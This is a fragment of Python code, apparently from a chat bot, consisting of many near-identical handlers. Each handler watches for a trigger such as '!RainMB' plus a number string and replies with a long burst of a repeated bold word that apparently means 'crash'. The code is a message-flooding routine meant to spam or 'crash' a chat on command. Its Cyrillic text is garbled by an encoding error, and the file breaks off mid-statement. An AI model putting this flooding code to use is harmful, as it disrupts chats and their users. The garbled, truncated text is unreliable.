    if mcss('!RainMB лџЛђл░Лѕ 185749586023945-49564568996775663492378423943504385304857203348762'):
        await mchs('**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n')
    if mcss('!RainMB лџЛђл░Лѕ 185749586023945-4956456899677566349237842394350438530485720334876'):
        await mchs('**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n')
    if mcss('!RainMB лџЛђл░Лѕ 185749586023945-495645689967756634923784239435043853048572033487'):
        await mchs('**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n')
    if mcss('!RainMB лџЛђл░Лѕ 185749586023945-49564568996775663492378423943504385304857203348'):
        await mchs('**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n')
    if mcss('!RainMB 185749586023945-4956456899677566349237842394350438530485720334'):
        await mchs('**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n')
    if mcss('!RainMB 185749586023945-495645689967756634923784239435043853048572033'):
        await mchs('**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n')
    if mcss('!RainMB 185749586023945-49564568996775663492378423943504385304857203'):
        await mchs('**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n')
    if mcss('!RainMB 185749586023945-4956456899677566349237842394350438530485720'):
        await mchs('**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n')
    if mcss('!RainMB 185749586023945-495645689967756634923784239435043853048572'):
        await mchs('**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n')
    if mcss('!RainMB 185749586023945-4956456899677566349237842394350438530485'):
        await mchs('**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n')
    if mcss('**лџ ла лљ ле**'):
        await mchs('**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n')
    if mcss('**лџ ла лљ ле**'):
        await mchs('**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n')
    if mcss('**лџ ла лљ ле**'):
        await mchs('**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n')
    if mcss('**лџ ла лљ ле**'):
        await mchs('**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n')
    if mcss('**лџ ла лљ ле**'):
        await mchs('**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n')
    if mcss('**лџ ла лљ ле**'):
        await mchs('**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n')
    if mcss('**лџ ла лљ ле**'):
        await mchs('**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n')
    if mcss('**лџ ла лљ ле**'):
        await mchs('**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n')
    if mcss('**лџ ла лљ ле**'):
        await mchs('**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n')
    if mcss('**лџ ла лљ ле**'):
        await mchs('**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n')
    if mcss('**лџ ла лљ ле**'):
        await mchs('**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n')
    if mcss('**лџ ла лљ ле**'):
        await mchs('**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n')
    if mcss('**лџ ла лљ ле**'):
        await mchs('**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n')
    if mcss('**лџ ла лљ ле**'):
        await mchs('**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n')
    if mcss('**лџ ла лљ ле**'):
        await mchs('**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n')
    if mcss('**лџ ла лљ ле**'):
        await mchs('**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n')
    if mcss('**лџ ла лљ ле**'):
        await mchs('**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n')
    if mcss('**лџ ла лљ ле**'):
        await mchs('**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n')
    if mcss('**лџ ла лљ ле**'):
        await mchs('**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n')
    if mcss('**лџ ла лљ ле**'):
        await mchs('**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n')
    if mcss('**лџ ла лљ ле**'):
        await mchs('**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n**лџ ла лљ ле**\n')
    if mcss('**лџ ла лљ ле**'):
